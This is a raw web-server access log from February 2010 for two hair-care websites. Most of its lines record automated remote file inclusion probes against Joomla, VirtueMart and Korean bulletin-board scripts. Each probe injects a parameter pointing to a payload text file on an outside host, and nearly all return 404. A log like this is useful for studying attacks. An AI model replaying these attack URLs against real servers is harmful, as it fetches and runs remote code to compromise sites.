72.241.52.111 - - [08/Feb/2010:06:11:52 -0800] "GET /logs/access_100125.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.241.52.111 - - [08/Feb/2010:06:11:52 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.241.52.111 - - [08/Feb/2010:06:11:55 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.103.128.44 - - [08/Feb/2010:06:15:14 -0800] "GET /logs/access.log/index.php?sayfa=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.90.47.134 - - [08/Feb/2010:06:18:53 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.90.47.134 - - [08/Feb/2010:06:18:53 -0800] "GET /logs/access_091221.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.90.47.134 - - [08/Feb/2010:06:18:53 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.90.47.134 - - [08/Feb/2010:06:18:53 -0800] "GET /logs/access_100111.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [08/Feb/2010:06:24:03 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [08/Feb/2010:06:24:03 -0800] "GET /logs/access_091221.log//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [08/Feb/2010:06:24:03 -0800] "GET /skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [08/Feb/2010:06:24:05 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [08/Feb/2010:06:24:05 -0800] "GET /skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [08/Feb/2010:06:24:05 -0800] "GET /logs/access_091221.log//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [08/Feb/2010:06:24:29 -0800] "GET /skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [08/Feb/2010:06:24:29 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [08/Feb/2010:06:24:29 -0800] "GET /logs/access_091221.log%20%20//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [08/Feb/2010:06:25:25 -0800] "GET /skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [08/Feb/2010:06:25:25 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [08/Feb/2010:06:25:25 -0800] "GET /logs/access_091221.log%20%20//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.90.47.134 - - [08/Feb/2010:06:26:04 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.90.47.134 - - [08/Feb/2010:06:26:04 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.214.45.106 - - [08/Feb/2010:06:27:01 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Opera/8.01 (Windows NT 5.1)" "freehairsecrets.com"
91.214.45.106 - - [08/Feb/2010:06:27:02 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Opera/8.01 (Windows NT 5.1)" "freehairsecrets.com"
88.250.216.231 - - [08/Feb/2010:06:29:37 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.freehairsecrets.com"
88.250.216.231 - - [08/Feb/2010:06:29:42 -0800] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.freehairsecrets.com"
69.90.47.134 - - [08/Feb/2010:06:29:49 -0800] "GET /logs/access_091207.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.90.47.134 - - [08/Feb/2010:06:29:49 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.90.47.134 - - [08/Feb/2010:06:29:49 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.90.47.134 - - [08/Feb/2010:06:29:49 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:06:30:29 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:06:30:29 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:06:30:29 -0800] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:06:30:29 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:06:30:29 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:06:30:29 -0800] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.178 - - [08/Feb/2010:06:52:46 -0800] "GET /com_dbquery/compon/administrator//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:06:52:49 -0800] "GET /logs//com_dbquery/compon/administrator//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:06:53:23 -0800] "GET /logs/access.log//com_dbquery/compon/administrator//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.70.72.86 - - [08/Feb/2010:06:56:43 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.70.72.86 - - [08/Feb/2010:06:56:43 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.70.72.86 - - [08/Feb/2010:06:56:43 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.112.106 - - [08/Feb/2010:06:58:32 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13319 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:06:59:47 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:06:59:47 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:06:59:47 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:07:00:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:07:00:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:07:00:12 -0800] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:07:00:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:07:00:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:07:00:26 -0800] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:07:01:42 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:07:01:42 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:07:01:42 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:07:03:21 -0800] "GET /logs/components/com_galleria/board//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:07:03:27 -0800] "GET /components/com_galleria/board//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:07:04:06 -0800] "GET /logs/access.log/components/com_galleria/board//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.94.213 - - [08/Feb/2010:07:04:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
220.181.94.213 - - [08/Feb/2010:07:05:01 -0800] "GET /freehairsecretsphp/viewtopic.php?p=18923 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
66.103.128.44 - - [08/Feb/2010:07:06:28 -0800] "GET /administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.103.128.44 - - [08/Feb/2010:07:06:28 -0800] "GET /logs//administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.103.128.44 - - [08/Feb/2010:07:06:28 -0800] "GET /logs/access.log//administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:07:10:00 -0800] "GET /logs/delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:07:10:05 -0800] "GET /delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:07:11:21 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.247.222.83 - - [08/Feb/2010:07:12:14 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
66.103.128.44 - - [08/Feb/2010:07:12:22 -0800] "GET /administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.103.128.44 - - [08/Feb/2010:07:12:22 -0800] "GET /logs//administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.103.128.44 - - [08/Feb/2010:07:12:22 -0800] "GET /logs/access.log%20%20//administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.139.0.75 - - [08/Feb/2010:07:13:10 -0800] "GET /logs/access.log///?path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.139.0.75 - - [08/Feb/2010:07:13:10 -0800] "GET //?path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.139.0.75 - - [08/Feb/2010:07:13:10 -0800] "GET /logs///?path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.247.222.83 - - [08/Feb/2010:07:13:37 -0800] "GET /freehairsecretsphp/viewtopic.php?p=11099 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
121.254.214.60 - - [08/Feb/2010:07:14:07 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.214.60 - - [08/Feb/2010:07:14:07 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.214.60 - - [08/Feb/2010:07:14:10 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.12.74.245 - - [08/Feb/2010:07:30:29 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.vmtubes.com.cn/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.12.74.245 - - [08/Feb/2010:07:30:29 -0800] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.vmtubes.com.cn/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.12.74.245 - - [08/Feb/2010:07:30:29 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.vmtubes.com.cn/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.122.158.94 - - [08/Feb/2010:07:32:08 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
222.122.158.94 - - [08/Feb/2010:07:32:08 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
222.122.158.94 - - [08/Feb/2010:07:32:08 -0800] "GET /logs/access_100125.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
222.122.158.94 - - [08/Feb/2010:07:32:37 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
222.122.158.94 - - [08/Feb/2010:07:32:37 -0800] "GET /logs/access_100125.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
222.122.158.94 - - [08/Feb/2010:07:32:37 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
222.122.158.94 - - [08/Feb/2010:07:32:56 -0800] "GET /logs/access_100125.log%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
66.249.65.225 - - [08/Feb/2010:07:33:23 -0800] "GET /freehairsecretsphp/templates/subSilver/images/lang_english/icon_pm.gif HTTP/1.1" 200 833 "-" "Googlebot-Image/1.0" "www.freehairsecrets.com"
222.122.158.94 - - [08/Feb/2010:07:33:28 -0800] "GET /logs/access_100125.log%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
67.195.115.240 - - [08/Feb/2010:07:42:19 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
67.195.115.240 - - [08/Feb/2010:07:42:20 -0800] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
123.143.29.250 - - [08/Feb/2010:07:48:00 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
123.143.29.250 - - [08/Feb/2010:07:48:00 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
123.143.29.250 - - [08/Feb/2010:07:48:00 -0800] "GET /bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.1.150.2 - - [08/Feb/2010:07:49:23 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:07:49:23 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:07:49:23 -0800] "GET /logs/access_091214.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:07:50:44 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.1.150.2 - - [08/Feb/2010:07:50:44 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.1.150.2 - - [08/Feb/2010:07:50:44 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.1.150.2 - - [08/Feb/2010:07:51:43 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.55.175.82 - - [08/Feb/2010:07:53:04 -0800] "GET /logs//show_image_in_imgtag.php?mosConfig.absolute.path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
74.55.175.82 - - [08/Feb/2010:07:53:04 -0800] "GET /logs/access_091221.log//show_image_in_imgtag.php?mosConfig.absolute.path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
74.55.175.82 - - [08/Feb/2010:07:53:04 -0800] "GET /show_image_in_imgtag.php?mosConfig.absolute.path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:07:53:49 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:07:53:49 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:07:53:49 -0800] "GET /logs/access_100118.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.55.175.82 - - [08/Feb/2010:07:53:57 -0800] "GET /logs/access_100111.log//show_image_in_imgtag.php?mosConfig.absolute.path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
195.184.217.50 - - [08/Feb/2010:07:54:41 -0800] "GET /logs/access_100118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.184.217.50 - - [08/Feb/2010:07:54:41 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.184.217.50 - - [08/Feb/2010:07:54:41 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
